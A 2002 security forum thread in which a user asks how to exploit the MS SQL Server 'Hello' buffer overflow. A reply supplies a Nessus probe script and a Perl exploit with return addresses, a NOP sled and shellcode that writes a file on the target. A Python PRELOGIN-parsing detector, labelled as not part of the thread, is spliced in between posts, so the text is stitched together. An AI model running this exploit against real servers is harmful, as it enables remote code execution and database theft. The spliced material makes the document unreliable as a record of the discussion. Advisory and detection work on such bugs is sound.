Security Forums

MS SQL Hello Overflow

RichieRich (Just Arrived, joined 10 Dec 2002)

Posted: Tue Dec 10, 2002 7:16 am    Post subject: MS SQL Hello Overflow

Does anyone know how to exploit the MS SQL Hello buffer overflow? Any information would be greatly appreciated.
ShaolinTiger (Forum Fanatic, Kuala Lumpur, Malaysia, joined 18 Apr 2002)

Posted: Tue Dec 10, 2002 12:10 pm

Versions Affected:

Microsoft SQL Server 7.0
Microsoft Data Engine (MSDE) 1.0
Microsoft SQL Server 2000
Microsoft Desktop Engine (MSDE) 2000

Scope:

The first vulnerability concerns the possibility of overwriting memory by sending a specially crafted login request to the SQL Server (the so-called "Hello Bug"). This could result in the execution of arbitrary code. Entercept protects against code execution as a result of buffer overflows.

The second vulnerability is a buffer overflow condition in one of the Database Console Commands (DBCC) and exploitation could lead to arbitrary code execution. Entercept's Database Edition prevents exploitation of several buffer overflow conditions in the DBCCs by blocking access to these commands. In addition, Entercept Standard Edition's buffer overflow protection prevents code execution as a result of buffer overflows.

The third vulnerability is found in the SQL Agent, which can receive and execute jobs submitted by a database user. The privileges that come with running jobs by the SQL Agent may be higher than those of the database user that submitted them. Entercept's Database Edition blocks access to the job scheduling stored procedures and thus prevents this elevation of privileges.

Nessus also has this one in its database.

Code:
##
#
# this script tests for the "You had me at hello" overflow
# in MSSQL (tcp/1433)
# Copyright Dave Aitel (2002)
# Bug found by: Dave Aitel (2002)
#
##
#TODO:
#technically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!


if(description)
{
 script_id(11067);
# script_cve_id("CVE-2000-0402");
 script_version ("$Revision: 0.1 $");
 name["english"] = "Microsoft SQL Server Hello Overflow";
 script_name(english:name["english"]);
 
 desc["english"] = "
The remote MS SQL server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";

 script_description(english:desc["english"]);
 
 summary["english"] = "Microsoft SQL Server Hello Overflow";
 script_summary(english:summary["english"]);
 
 script_category(ACT_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel");
 family["english"] = "Windows";
 script_family(english:family["english"]);
 script_require_ports(1433);
 exit(0);
}

#
# The script code starts here
#
# 36-byte TDS PRELOGIN header (option table, version and encryption
# fields); taken from mssql.spk
pkt_hdr = raw_string(
0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00  ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b
,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03  ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02
,0x10 ,0x00 ,0x00 ,0x00
);

# NUL terminator of the instance name plus the thread id; taken from mssql.spk
pkt_tail = raw_string (
0x00 ,0x24 ,0x01 ,0x00 ,0x00
);

#technically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!
port = 1433;
found = 0;
report = "The SQL Server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";


if(get_port_state(port))
{
    soc = open_sock_tcp(port);

    if(soc)
    {
        # uncomment this to see what normally happens
        # attack_string = "MSSQLServer";
        # this line actually tests for the overflow: a 560-byte instance name
        attack_string = crap(560);
        # this creates a variable called sql_packet
        sql_packet = pkt_hdr + attack_string + pkt_tail;
        send(socket:soc, data:sql_packet);

        r = recv(socket:soc, length:4096);
        close(soc);
        # display("Result:", r, "\n");
        # a patched server answers the PRELOGIN; no reply means it choked on it
        if(!r)
        {
            # display("Security Hole in MSSQL\n");
            security_hole(port:port, data:report);
        }
    }
}


And below is a simple exploit that writes a file to the target machine:

Code:
#!/usr/local/bin/perl

#-----------------------------------------------------------
#   Exploit will create file '\scan_sql2k_bo2.'
#
# SQL Server 2000 'Hello Bug' for Win2k(SP2)
#    by sk@scan-associates.net & spoonfork
#
# Bug found by
#   Dave Aitel
#   http://online.securityfocus.com/archive/1/286311/2002-08-02/2002-08-08/0
#
# http://www.scan-associates.net/
# greetz to:    scan clan, especially to tynon, pokleyzz, and wyse
#      Alphaque and L33tdawg.
#      and Dave Aitel for finding and not releasing the exploit :>
# original and most up-to-date of dis file can be found in
#   http://www.scan-associates.net/papers/sql2kx2.txt
#-----------------------------------------------------------
use Socket;


$connect_host = $ARGV[0];

if (!defined($connect_host)) {
   print "Usage: $0 <target>\n";
   exit 255;
}

$port = 1433;
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);

$bug =  "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b";
$bug .=  "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02";
$bug .=  "\x10\x00\x00\x00";
$bug2 =  "A" x 528;
$bug .=  $bug2;
$bug .=  "\x6b\xd0\xc0\x40";
$bug .=  "AAAA";
$bug .=  "\x83\x91\xe8\x77";
$bug .=  "\x50\x1e\xd0\x42";
$bug .=  "\x0b\x03\x0f\x02";
$bug .=  "DDDD";
$bug .=  "\x50\x1e\xd0\x42";
$bug .=  "\x50\x1e\xd0\x42";
$bug3 =  "\x90" x 88;
$bug .=  $bug3;
$bug .=  "\x8B\xF1\x33\xC0\xC7\x06\x5C\x73\x63\x61\xC7\x46\x04\x6E\x5F\x73";
$bug .=  "\x71\xC7\x46\x08\x6C\x32\x6B\x5F\xC7\x46\x0C\x62\x6F\x32\x2E\x88";
$bug .=  "\x46\x10\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\xB8\x6C\xC2";
$bug .=  "\x01\x78\xFF\xD0\xB8\xC7\x3E\x01\x78\xFF\xD0";

$bug .=  "\x00\x24\x01\x00\x00";

print SOCKET $bug;
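Added here as a defender's check, not code from the thread or from the Nessus or scan-associates scripts above: a Python parser for the TDS PRELOGIN packet those scripts send, built from the same header bytes, that flags a packet whose instance-name string (the INSTOPT option) overruns the length the option table declares, which is the condition the Hello overflow relies on. The option token names, the 32-byte sanity bound and the two sample packets are assumptions.

```python
import struct

TOKEN_INSTOPT = 0x02     # PRELOGIN option carrying the instance name
MAX_INSTANCE_NAME = 32   # assumed sane upper bound for an instance name

PKT_HDR = bytes.fromhex(  # same 36-byte header the probe above sends
    "12 01 00 34 00 00 00 00"  # TDS header: type 0x12 PRELOGIN, EOM, length 0x34
    "00 00 15 00 06"           # VERSION    at offset 0x15, 6 bytes
    "01 00 1b 00 01"           # ENCRYPTION at offset 0x1b, 1 byte
    "02 00 1c 00 0c"           # INSTOPT    at offset 0x1c, 12 bytes
    "03 00 28 00 04"           # THREADID   at offset 0x28, 4 bytes
    "ff"                       # end of option table (0xff terminator)
    "08 00 02 10 00 00"        # VERSION data
    "00"                       # ENCRYPTION data
)
PKT_TAIL = bytes.fromhex("00 24 01 00 00")  # NUL terminator + THREADID data


def build_prelogin(instance: bytes) -> bytes:  # constructed sample packet
    return PKT_HDR + instance + PKT_TAIL


def check_prelogin(pkt: bytes) -> dict:
    """Flag a TDS PRELOGIN packet whose instance-name field does not fit its header."""
    if len(pkt) < 8 or pkt[0] != 0x12:
        return {"verdict": "ignore", "findings": []}
    findings = []
    declared = struct.unpack(">H", pkt[2:4])[0]
    if declared != len(pkt):
        findings.append(f"declared length {declared} != actual {len(pkt)}")
    body, pos = pkt[8:], 0
    while pos < len(body) and body[pos] != 0xFF:
        if pos + 5 > len(body):
            findings.append("option table truncated")
            break
        token = body[pos]
        off, ln = struct.unpack(">HH", body[pos + 1:pos + 5])
        if off > len(body):
            findings.append(f"option {token:#x} offset {off} beyond packet")
        elif token == TOKEN_INSTOPT:
            # The vulnerable server copies up to the NUL, not up to the declared length.
            field = body[off:]
            nul = field.find(b"\x00")
            actual = len(field) if nul < 0 else nul
            if actual > ln or actual > MAX_INSTANCE_NAME:
                findings.append(f"INSTOPT string is {actual} bytes, declared {ln}")
        pos += 5
    return {"verdict": "suspicious" if findings else "ok", "findings": findings}


BENIGN = build_prelogin(b"MSSQLServer")  # 52 bytes, matches the 0x34 in the header
OVERSIZED = build_prelogin(b"A" * 560)   # constructed: the probe's crap(560) payload
```

Run over a capture of tcp/1433 traffic, the declared-length and INSTOPT checks separate a normal client handshake from the oversized request the scripts send.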
chet (Just Arrived, Nottingham, UK, joined 07 Oct 2002)

Posted: Sat Jan 25, 2003 1:43 pm

They are going mad over in the states

Yep going mad in the states, huge DDoS attack

http://webhostingtalk.com/showthread.php?s=c8b022fd63798fcc6524175a8d4933e2&threadid=107128

And wow this is getting busy.
All times are GMT + 2 Hours